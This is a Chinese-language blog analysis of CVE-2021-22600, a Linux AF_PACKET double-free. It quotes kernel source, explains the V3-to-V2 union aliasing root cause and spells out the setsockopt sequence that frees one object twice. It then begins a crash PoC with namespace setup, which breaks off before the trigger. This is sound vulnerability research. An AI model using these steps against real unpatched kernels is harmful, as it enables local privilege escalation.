【CVE.0x0D】CVE-2021-22600 漏洞分析及利用

本文最后更新于:2025年5月6日 凌晨

少上网多读书

0x00. 一切开始之前

CVE-2021-22600 是一个发生在 Linux kernel 的网络子系统中的 Packet Socket 当中的 检查缺乏导致的类型混淆与释放后使用 漏洞,得益于在 Packet Socket 对完成 setsockopt() 操作中的 PACKET_VERSION 切换 socket 版本后的状态的检查不严格,以及对同一内核对象的双重记录,攻击者可以使内核将一个 TPACKET_V3 所用的对象在释放之后仍能被误用为 TPACKET_V2 所用类型,从而通过该漏洞 完成对特定内核对象的双重释放 ,最终攻击内核以完成本地提权

该漏洞的 CVSS 分数为 7.8 ,影响版本包括但不限于 4.14.175~4.14.258、4.19.114~4.19.221、5.4.29~5.4.167、5.5.14~5.10.87、5.11~5.15.11,本文我们选用 5.11.16 版本的内核源码进行分析

Packet Socket

Packet Socket 是 Linux 当中的一种用于在设备驱动层(OSI 模型自底向上第 2 层)接收 raw packets 的 sockets,从而使得开发者可以通过用户态程序在物理层上实现上层的协议解析模块(当然,这也就需要用户必须具备 CAP_NET_RAW 权限):

在创建 Packet Socket 时,我们应当将 domain 指定为 AF_PACKET:

1
packet_socket = socket(AF_PACKET, int socket_type, int protocol);

对于 socket type,我们有两种可选项:

  • SOCK_RAW:这为我们提供原始的 raw packet
  • SOCK_DGRAM :这为我们提供去掉了 Physical Header 的 packet

更多的使用方法我们就不深入介绍了,这里我们来看 Packet Socket 的内核实现,首先在模块初始化函数中注册了 PF_PACKET 这一 family:

/net/packet/af_packet.c

1
2
3
4
5
6
7
8
9
10
/* PF_PACKET address-family descriptor: once registered via sock_register()
 * below, socket(AF_PACKET, ...) is routed to packet_create() through it. */
static const struct net_proto_family packet_family_ops = {
.family = PF_PACKET,
.create = packet_create,
.owner = THIS_MODULE,
};

static int __init packet_init(void)
{
//...
rc = sock_register(&packet_family_ops);

在创建 Socket 时有如下调用栈:

1
2
3
4
__x64_sys_socket()
__sys_socket()
sock_create()
__sock_create()

__sock_create() 中会调用到 net_proto_family::create()

/net/socket.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
int __sock_create(struct net *net, int family, int type, int protocol,
struct socket **res, int kern)
{
int err;
struct socket *sock;
const struct net_proto_family *pf;

//...

rcu_read_lock();
pf = rcu_dereference(net_families[family]);
//...

err = pf->create(net, sock, protocol, kern);

因此会调用到 packet_family_ops::create ,即 packet_create

/net/packet/af_packet.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
/*
* Create a packet of type SOCK_PACKET.
*/

/* net_proto_family::create() for PF_PACKET: allocates and initializes the
 * packet_sock behind a new AF_PACKET socket. Requires CAP_NET_RAW in the
 * socket's network namespace; accepts only SOCK_DGRAM/SOCK_RAW/SOCK_PACKET. */
static int packet_create(struct net *net, struct socket *sock, int protocol,
int kern)
{
struct sock *sk;
struct packet_sock *po;
__be16 proto = (__force __be16)protocol; /* weird, but documented */
int err;

if (!ns_capable(net->user_ns, CAP_NET_RAW))
return -EPERM;
if (sock->type != SOCK_DGRAM && sock->type != SOCK_RAW &&
sock->type != SOCK_PACKET)
return -ESOCKTNOSUPPORT;

sock->state = SS_UNCONNECTED;

err = -ENOBUFS;
sk = sk_alloc(net, PF_PACKET, GFP_KERNEL, &packet_proto, kern);
if (sk == NULL)
goto out;

/* legacy SOCK_PACKET sockets get their own (reduced) ops table */
sock->ops = &packet_ops;
if (sock->type == SOCK_PACKET)
sock->ops = &packet_ops_spkt;

sock_init_data(sock, sk);

po = pkt_sk(sk);
init_completion(&po->skb_completion);
sk->sk_family = PF_PACKET;
po->num = proto;
po->xmit = dev_queue_xmit;

err = packet_alloc_pending(po);
if (err)
goto out2;

packet_cached_dev_reset(po);

sk->sk_destruct = packet_sock_destruct;
sk_refcnt_debug_inc(sk);

/*
* Attach a protocol block
*/

spin_lock_init(&po->bind_lock);
mutex_init(&po->pg_vec_lock);
po->rollover = NULL;
/* packet_rcv is the default delivery hook; packet_set_ring() may later
 * swap it to tpacket_rcv once a ring buffer exists */
po->prot_hook.func = packet_rcv;

if (sock->type == SOCK_PACKET)
po->prot_hook.func = packet_rcv_spkt;

po->prot_hook.af_packet_priv = sk;

/* a non-zero protocol means "start receiving immediately" */
if (proto) {
po->prot_hook.type = proto;
__register_prot_hook(sk);
}

mutex_lock(&net->packet.sklist_lock);
sk_add_node_tail_rcu(sk, &net->packet.sklist);
mutex_unlock(&net->packet.sklist_lock);

preempt_disable();
sock_prot_inuse_add(net, &packet_proto, 1);
preempt_enable();

return 0;
out2:
sk_free(sk);
out:
return err;
}

这里我们注意到 packet socket 的操作函数表被初始化为 packet_ops

/net/packet/af_packet.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/* proto_ops table for SOCK_RAW/SOCK_DGRAM AF_PACKET sockets; the entries
 * relevant to this analysis are setsockopt (packet_setsockopt) and mmap
 * (packet_mmap). Unsupported operations map to the sock_no_* stubs. */
static const struct proto_ops packet_ops = {
.family = PF_PACKET,
.owner = THIS_MODULE,
.release = packet_release,
.bind = packet_bind,
.connect = sock_no_connect,
.socketpair = sock_no_socketpair,
.accept = sock_no_accept,
.getname = packet_getname,
.poll = packet_poll,
.ioctl = packet_ioctl,
.gettstamp = sock_gettstamp,
.listen = sock_no_listen,
.shutdown = sock_no_shutdown,
.setsockopt = packet_setsockopt,
.getsockopt = packet_getsockopt,
.sendmsg = packet_sendmsg,
.recvmsg = packet_recvmsg,
.mmap = packet_mmap,
.sendpage = sock_no_sendpage,
};

setsockopt for Packet Socket

和其他类型的 socket 一样,packet socket 也为我们提供了 setsockopt 函数以进行各种高级功能,其内部实现和绝大多数 setsockopt 一样是个巨大的 switch:

/net/packet/af_packet.c

1
2
3
4
5
6
7
8
9
10
11
12
static int
packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
unsigned int optlen)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
int ret;

if (level != SOL_PACKET)
return -ENOPROTOOPT;

switch (optname) {

我们这里主要关注与我们的漏洞有关的几个子功能

PACKET_VERSION:版本变更

Packet Socket 存在三个不同的版本:V1、V2、V3 ,而 setsockopt 的 PACKET_VERSION 子功能让我们可以实时变更 Packet Socket 的版本:

/net/packet/af_packet.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
case PACKET_VERSION:
{
int val;

if (optlen != sizeof(val))
return -EINVAL;
if (copy_from_sockptr(&val, optval, sizeof(val)))
return -EFAULT;
switch (val) {
case TPACKET_V1:
case TPACKET_V2:
case TPACKET_V3:
break;
default:
return -EINVAL;
}
lock_sock(sk);
if (po->rx_ring.pg_vec || po->tx_ring.pg_vec) {
ret = -EBUSY;
} else {
po->tp_version = val;
ret = 0;
}
release_sock(sk);
return ret;
}

PACKET_RX_RING || PACKET_TX_RING:创建环形缓冲区

这两个子功能主要用于为数据包的收发创建高速的环形缓冲区, 用户可以将内核中的环形缓冲区映射到用户地址空间,从而实现快速的数据包收发功能 ,也就是我们常说的 zero copy ,这减少了系统调用的状态切换与数据拷贝开销:

  • 对于发送( TX )而言,应用程序直接将数据包写入映射到用户空间的缓冲区,之后内核便能直接读取缓冲区中的待发送数据包
  • 对于接收(RX)而言,内核直接将数据包写入映射到用户空间的缓冲区,之后在用户空间便能直接读取缓冲区中的已接收数据包

/net/packet/af_packet.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
case PACKET_RX_RING:
case PACKET_TX_RING:
{
union tpacket_req_u req_u;
int len;

lock_sock(sk);
switch (po->tp_version) {
case TPACKET_V1:
case TPACKET_V2:
len = sizeof(req_u.req);
break;
case TPACKET_V3:
default:
len = sizeof(req_u.req3);
break;
}
if (optlen < len) {
ret = -EINVAL;
} else {
if (copy_from_sockptr(&req_u.req, optval, len))
ret = -EFAULT;
else
ret = packet_set_ring(sk, &req_u, 0,
optname == PACKET_TX_RING);
}
release_sock(sk);
return ret;
}

环形缓冲区的核心结构是 pgv 结构体,本质上是一个指针,在实际使用时会被创建为 指针数组

/net/packet/internal.h

1
2
3
/* One ring block: kernel virtual address of a tp_block_size-byte buffer.
 * A ring is a kcalloc'd array of these (see alloc_pg_vec()). */
struct pgv {
char *buffer;
};

在看环形缓冲区之前,我们先来看用户应当提交的请求的格式,版本 V1、V2 和 V3 使用的是不同的格式:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
/* V1/V2 ring request submitted via PACKET_RX_RING / PACKET_TX_RING */
struct tpacket_req {
unsigned int tp_block_size; /* Minimal size of contiguous block */
unsigned int tp_block_nr; /* Number of blocks */
unsigned int tp_frame_size; /* Size of frame */
unsigned int tp_frame_nr; /* Total number of frames */
};

/* V3 ring request: same leading layout as tpacket_req plus V3 extras */
struct tpacket_req3 {
unsigned int tp_block_size; /* Minimal size of contiguous block */
unsigned int tp_block_nr; /* Number of blocks */
unsigned int tp_frame_size; /* Size of frame */
unsigned int tp_frame_nr; /* Total number of frames */
unsigned int tp_retire_blk_tov; /* timeout in msecs */
unsigned int tp_sizeof_priv; /* offset to private data area */
unsigned int tp_feature_req_word;
};

/* packet_setsockopt() copies sizeof(req) for V1/V2, sizeof(req3) for V3 */
union tpacket_req_u {
struct tpacket_req req;
struct tpacket_req3 req3;
};

下面是笔者以 V1 为例写的一个简单的 用户态请求环形缓冲区 的例子,环形缓冲区的总大小为 tp_block_size * tp_block_nr ,块大小 tp_block_size 便是 pgv 结构体数组中单个 entry 的大小,块数量自然是 pgv 数组成员数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
/* Userspace copy of the kernel's V1/V2 ring request (struct tpacket_req) */
struct tpacket_req {
unsigned int tp_block_size;
unsigned int tp_block_nr;
unsigned int tp_frame_size;
unsigned int tp_frame_nr;
};

/* Example: create a TPACKET_V1 packet socket and request a TX ring of
 * `nr` blocks of `size` bytes each (total ring = size * nr bytes).
 * Returns the socket fd on success, a negative value on failure.
 * NOTE(review): requires CAP_NET_RAW — run in a user+net namespace or as root. */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
struct tpacket_req req;
int socket_fd, version;
int ret;

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
ret = socket_fd;
goto err_out;
}

/* version must be set BEFORE the ring is created; it decides how the
 * ring request is interpreted by packet_set_ring() */
version = TPACKET_V1;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_VERSION)\n");
goto err_setsockopt;
}

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
/* frames must exactly tile the blocks: frames_per_block * block_nr == frame_nr */
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
goto err_setsockopt;
}

return socket_fd;

err_setsockopt:
close(socket_fd);
err_out:
return ret;
}

现在我们来验证这个大小,环形缓冲区的创建通过 packet_set_ring() 完成,根据 Packet Socket 版本的不同在操作上会存在一些细微的差别,一些私有数据会被存放在 packet_sock 这一结构体当中,以及对于 TX ring 和 RX ring而言在其中使用了两个不同的 packet_ring_buffer 结构体存放数据:

/net/packet/af_packet.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
struct pgv *pg_vec = NULL;
struct packet_sock *po = pkt_sk(sk);
unsigned long *rx_owner_map = NULL;
int was_running, order = 0;
struct packet_ring_buffer *rb;
struct sk_buff_head *rb_queue;
__be16 num;
int err;
/* Added to avoid minimal code churn */
struct tpacket_req *req = &req_u->req;

rb = tx_ring ? &po->tx_ring : &po->rx_ring;
rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue;

err = -EBUSY;
if (!closing) {
if (atomic_read(&po->mapped))
goto out;
if (packet_read_pending(rb))
goto out;
}

对于块数量不为 0 的情况,首先会进行一系列检查:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
if (req->tp_block_nr) {
unsigned int min_frame_size;

/* Sanity tests and some calculations */
err = -EBUSY;
if (unlikely(rb->pg_vec))
goto out;

switch (po->tp_version) {
case TPACKET_V1:
po->tp_hdrlen = TPACKET_HDRLEN;
break;
case TPACKET_V2:
po->tp_hdrlen = TPACKET2_HDRLEN;
break;
case TPACKET_V3:
po->tp_hdrlen = TPACKET3_HDRLEN;
break;
}

err = -EINVAL;
if (unlikely((int)req->tp_block_size <= 0))
goto out;
if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))
goto out;
min_frame_size = po->tp_hdrlen + po->tp_reserve;
if (po->tp_version >= TPACKET_V3 &&
req->tp_block_size <
BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size)
goto out;
if (unlikely(req->tp_frame_size < min_frame_size))
goto out;
if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
goto out;

rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
if (unlikely(rb->frames_per_block == 0))
goto out;
if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr))
goto out;
if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
req->tp_frame_nr))
goto out;

之后分配 pgv 结构体,这里我们可以看到使用的是 alloc_pg_vec() 函数进行分配,首先分配成员数量为 tp_block_nrpgv 结构体数组,接下来进行 tp_block_nr 次的为每个数组成员调用页级内存分配 API 从 buddy allocator 分配内存(失败则调用 vzalloc() 分配),将 page 在 direct mapped area 上对应的地址存放到 pgv 结构体当中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
/* Allocate one ring block of (1 << order) zeroed pages. Tries the buddy
 * allocator first, then vmalloc, then buddy again without __GFP_NORETRY.
 * Returns the kernel virtual address of the block, or NULL on failure. */
static char *alloc_one_pg_vec_page(unsigned long order)
{
char *buffer;
gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP |
__GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY;

buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;

/* __get_free_pages failed, fall back to vmalloc */
buffer = vzalloc(array_size((1 << order), PAGE_SIZE));
if (buffer)
return buffer;

/* vmalloc failed, lets dig into swap here */
gfp_flags &= ~__GFP_NORETRY;
buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;

/* complete and utter failure */
return NULL;
}

/* Allocate the pgv array (tp_block_nr entries, kcalloc'd from GFP_KERNEL)
 * and one block per entry. On partial failure the already-allocated
 * blocks and the array itself are released and NULL is returned. */
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;

pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}


static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
//...
if (req->tp_block_nr) {
//...
err = -ENOMEM;
order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order);

不难得到 pgv 结构体长这个样子:

之后根据 packet version 以及 ring 的类别( TXRX )进行不同处理:

  • 对于 TPACKET_V3 而言,如果不是 tx_ring ,则调用 init_prb_bdqc() 进行初始化
  • 对于其他 version,如果不是 tx_ring ,则调用 bitmap_alloc() 分配一个位图
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
	if (unlikely(!pg_vec))
goto out;
switch (po->tp_version) {
case TPACKET_V3:
/* Block transmit is not supported yet */
if (!tx_ring) {
init_prb_bdqc(po, rb, pg_vec, req_u);
} else {
struct tpacket_req3 *req3 = &req_u->req3;

if (req3->tp_retire_blk_tov ||
req3->tp_sizeof_priv ||
req3->tp_feature_req_word) {
err = -EINVAL;
goto out_free_pg_vec;
}
}
break;
default:
if (!tx_ring) {
rx_owner_map = bitmap_alloc(req->tp_frame_nr,
GFP_KERNEL | __GFP_NOWARN | __GFP_ZERO);
if (!rx_owner_map)
goto out_free_pg_vec;
}
break;
}
}

如果 tp_block_nr 是 0 而 tp_frame_nr 非 0 的话则直接跳到出口返回,否则仍会继续走下面的路径 :

1
2
3
4
5
6
/* Done */
else {
err = -EINVAL;
if (unlikely(req->tp_frame_nr))
goto out;
}

完成对 pgv 的分配之后,接下来存放到 socket 结构体内部,替换掉旧的 pgv ,如果是 V2 及之前的版本还要替换掉旧的 rx_owner_map ,这里我们也注意到 当 tp_block_nr 和 tp_frame_nr 都是 0 的情况下则不会进行分配,而是会进行清理的工作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
/* Detach socket from network */
spin_lock(&po->bind_lock);
was_running = po->running;
num = po->num;
if (was_running) {
po->num = 0;
__unregister_prot_hook(sk, false);
}
spin_unlock(&po->bind_lock);

synchronize_net();

err = -EBUSY;
mutex_lock(&po->pg_vec_lock);
if (closing || atomic_read(&po->mapped) == 0) {
err = 0;
spin_lock_bh(&rb_queue->lock);
swap(rb->pg_vec, pg_vec);
if (po->tp_version <= TPACKET_V2)
swap(rb->rx_owner_map, rx_owner_map);
rb->frame_max = (req->tp_frame_nr - 1);
rb->head = 0;
rb->frame_size = req->tp_frame_size;
spin_unlock_bh(&rb_queue->lock);

swap(rb->pg_vec_order, order);
swap(rb->pg_vec_len, req->tp_block_nr);

rb->pg_vec_pages = req->tp_block_size/PAGE_SIZE;
po->prot_hook.func = (po->rx_ring.pg_vec) ?
tpacket_rcv : packet_rcv;
skb_queue_purge(rb_queue);
if (atomic_read(&po->mapped))
pr_err("packet_mmap: vma is busy: %d\n",
atomic_read(&po->mapped));
}
mutex_unlock(&po->pg_vec_lock);

这里我们会注意到有存在一个字段复用的情况,对于 V1 和 V2 而言会使用 packet_ring_buffer::rx_owner_map 存放 rx_owner_map ,对于 V3 而言会在 init_prb_bdqc() 中额外使用 packet_ring_buffer::prb_bdqc::pkbdq 存放 pgv ,这两个字段在结构体中的物理位置相同:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
struct tpacket_kbdq_core {
struct pgv *pkbdq;
//...
}

struct packet_ring_buffer {
struct pgv *pg_vec;

//...

/* V1/V2 and V3 state overlap here: rx_owner_map (V1/V2) shares its
 * offset with prb_bdqc.pkbdq (V3's copy of pg_vec, its first member).
 * A version switch that leaves a stale V3 pkbdq behind makes V2
 * teardown free it as rx_owner_map — the CVE-2021-22600 double free. */
union {
unsigned long *rx_owner_map;
struct tpacket_kbdq_core prb_bdqc;
};
};

static void init_prb_bdqc(struct packet_sock *po,
struct packet_ring_buffer *rb,
struct pgv *pg_vec,
union tpacket_req_u *req_u)
{
struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
struct tpacket_block_desc *pbd;

memset(p1, 0x0, sizeof(*p1));

p1->knxt_seq_num = 1;
p1->pkbdq = pg_vec;

回到 packet_set_ring() ,最后就是收尾工作,将替换出来的旧的 pgvrx_owner_map 进行释放:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
	spin_lock(&po->bind_lock);
if (was_running) {
po->num = num;
register_prot_hook(sk);
}
spin_unlock(&po->bind_lock);
if (pg_vec && (po->tp_version > TPACKET_V2)) {
/* Because we don't support block-based V3 on tx-ring */
if (!tx_ring)
prb_shutdown_retire_blk_timer(po, rb_queue);
}

out_free_pg_vec:
bitmap_free(rx_owner_map);
if (pg_vec)
free_pg_vec(pg_vec, order, req->tp_block_nr);
out:
return err;
}

mmap for Packet Socket

现在我们来看如何在用户态使用 pgv 缓冲区进行数据交换,在我们通过 setsockopt() 创建并分配 pgv 缓冲区之后,我们可以直接通过 mmap() 将缓冲区映射到用户态,在我们创建 mmap 区域时内核便会直接建立 pgv 缓冲区在用户空间的映射,省略了传统的通过缺页中断插入页面的过程的页面访问开销:

/net/packet/af_packet.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
/* mmap() handler: maps every page of both rings (RX then TX) into the
 * user VMA up front via vm_insert_page(), so no page faults are taken
 * on later accesses. The VMA must start at offset 0 and be exactly the
 * combined ring size. Increments po->mapped on success. */
static int packet_mmap(struct file *file, struct socket *sock,
struct vm_area_struct *vma)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
unsigned long size, expected_size;
struct packet_ring_buffer *rb;
unsigned long start;
int err = -EINVAL;
int i;

if (vma->vm_pgoff)
return -EINVAL;

mutex_lock(&po->pg_vec_lock);

/* total ring size = sum over rx_ring and tx_ring of blocks * pages */
expected_size = 0;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec) {
expected_size += rb->pg_vec_len
* rb->pg_vec_pages
* PAGE_SIZE;
}
}

if (expected_size == 0)
goto out;

size = vma->vm_end - vma->vm_start;
if (size != expected_size)
goto out;

start = vma->vm_start;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec == NULL)
continue;

for (i = 0; i < rb->pg_vec_len; i++) {
struct page *page;
void *kaddr = rb->pg_vec[i].buffer;
int pg_num;

/* insert each page of the block into the user VMA */
for (pg_num = 0; pg_num < rb->pg_vec_pages; pg_num++) {
page = pgv_to_page(kaddr);
err = vm_insert_page(vma, start, page);
if (unlikely(err))
goto out;
start += PAGE_SIZE;
kaddr += PAGE_SIZE;
}
}
}

atomic_inc(&po->mapped);
vma->vm_ops = &packet_mmap_ops;
err = 0;

out:
mutex_unlock(&po->pg_vec_lock);
return err;
}

需要注意的是在 vm_insert_page() 中会对页面类型进行检查,需要满足以下条件:

  • 不是匿名页(阻止我们映射进程中不与文件关联的页面,例如堆和栈)
  • 不是 Slab 页面(阻止我们映射已经分配给 slab 子系统的内核普通堆对象)
  • 不是有类型的页面(阻止我们映射内核中用于特殊目的的物理页,如 ZRAM 页面)

不过从 buddy system 直接分配的空闲页面正常情况下都满足这些要求

/mm/memory.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
/* Reject pages that must not be mapped into userspace: anonymous pages,
 * slab pages, and pages with a special type. Plain buddy pages pass. */
static int validate_page_before_insert(struct page *page)
{
if (PageAnon(page) || PageSlab(page) || page_has_type(page))
return -EINVAL;
flush_dcache_page(page);
return 0;
}

/* Validate the page, then install a PTE for it at addr under the page
 * table lock. Returns 0 on success or a negative errno. */
static int insert_page(struct vm_area_struct *vma, unsigned long addr,
struct page *page, pgprot_t prot)
{
struct mm_struct *mm = vma->vm_mm;
int retval;
pte_t *pte;
spinlock_t *ptl;

retval = validate_page_before_insert(page);
if (retval)
goto out;
retval = -ENOMEM;
pte = get_locked_pte(mm, addr, &ptl);
if (!pte)
goto out;
retval = insert_page_into_pte_locked(mm, pte, addr, page, prot);
pte_unmap_unlock(pte, ptl);
out:
return retval;
}

/* Public helper for drivers: map a single kernel page into a user VMA at
 * addr. Checks bounds and refcount, forces the VMA to VM_MIXEDMAP (and
 * forbids VM_PFNMAP), then delegates to insert_page(). */
int vm_insert_page(struct vm_area_struct *vma, unsigned long addr,
struct page *page)
{
if (addr < vma->vm_start || addr >= vma->vm_end)
return -EFAULT;
if (!page_count(page))
return -EINVAL;
if (!(vma->vm_flags & VM_MIXEDMAP)) {
BUG_ON(mmap_read_trylock(vma->vm_mm));
BUG_ON(vma->vm_flags & VM_PFNMAP);
vma->vm_flags |= VM_MIXEDMAP;
}
return insert_page(vma, addr, page, vma->vm_page_prot);
}
EXPORT_SYMBOL(vm_insert_page);

0x01. 漏洞分析

虽然版本的随意切换给 Packet Socket 带来了非常高的灵活性,但也带来了不小的风险

Root Cause

注意到 V1 和 V2 使用的 packet_ring_buffer::rx_owner_map 和 V3 使用的 packet_ring_buffer::prb_bdqc 共享同一联合体字段,且存放 rx_owner_map 的 packet_ring_buffer::rx_owner_map 和存放 pgv 的 packet_ring_buffer::prb_bdqc::pkbdq 位于结构体中的同一偏移,而 packet socket 的版本切换并没有限制 ,那么便会存在如下情况:

  • 首先在 V3 下用 setsockopt 创建一个 RX ring buffer ,此时 pgv 被同时存在 RX ring 的 packet_ring_buffer::pg_vecpacket_ring_buffer::prb_bdqc::pkbdq
  • 接下来用 setsockopt 释放掉 packet_ring_buffer::pg_vec ,此时 packet_ring_buffer::prb_bdqc::pkbdq依旧保留着对旧的 pgv 的记录
  • 接下来用 setsockopt 切换到 V2,再用 setsockopt 创建一个 RX ring buffer此时在 packet_ring_buffer::prb_bdqc::pkbdq 中仍存有的旧的 pgv 记录 便会被当作 packet_ring_buffer::rx_owner_map 给释放掉 ,而 packet_ring_buffer::pg_vec 本身也会被释放掉,因此这个内核对象 便会被释放两次

由此我们便有了一个 double free 的漏洞

说实话笔者觉得这 b 洞纯粹是省空间省魔怔了硬要上联合体导致的,你要说 page 这种数量巨大且用途特别多的结构体为了压缩空间搞各种复合联合体那👴4️⃣认可的,tm 的一个 packet_ring_buffer 又不会被大量分配, 真有必要省这 8 个字节?

Proof-Of-Concept

这里笔者给出自己写的 POC,主要就是直接用 Double Free 造成 kernel crash:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
/**
* Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/socket.h>

#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif

#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif

#define SUCCESS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg) puts(SUCCESS_MSG(msg))
#define log_info(msg) puts(INFO_MSG(msg))
#define log_error(msg) puts(ERR_MSG(msg))

/* Print the failing step, sleep 5s so the message survives a possible
 * crash/reset, then terminate the process with failure status. */
void err_exit(char *msg)
{
printf(ERR_MSG("[x] Error at: ") "%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

/* Pin the calling process to CPU `core` so all subsequent slab/page
 * operations hit the same per-CPU caches.
 * NOTE(review): sched_setaffinity()'s return value is unchecked —
 * confirm pinning succeeded if sprays behave unexpectedly. */
void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf(INFO_MSG("[*] Process binded to core: ") "%d\n", core);
}

/* Enter fresh mount/user/net namespaces and map this uid/gid to root
 * inside the user namespace, granting CAP_NET_RAW there (needed for
 * AF_PACKET). Best-effort: open()/write() results are deliberately
 * unchecked — a failure will surface when socket() is attempted. */
void unshare_setup(void)
{
char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

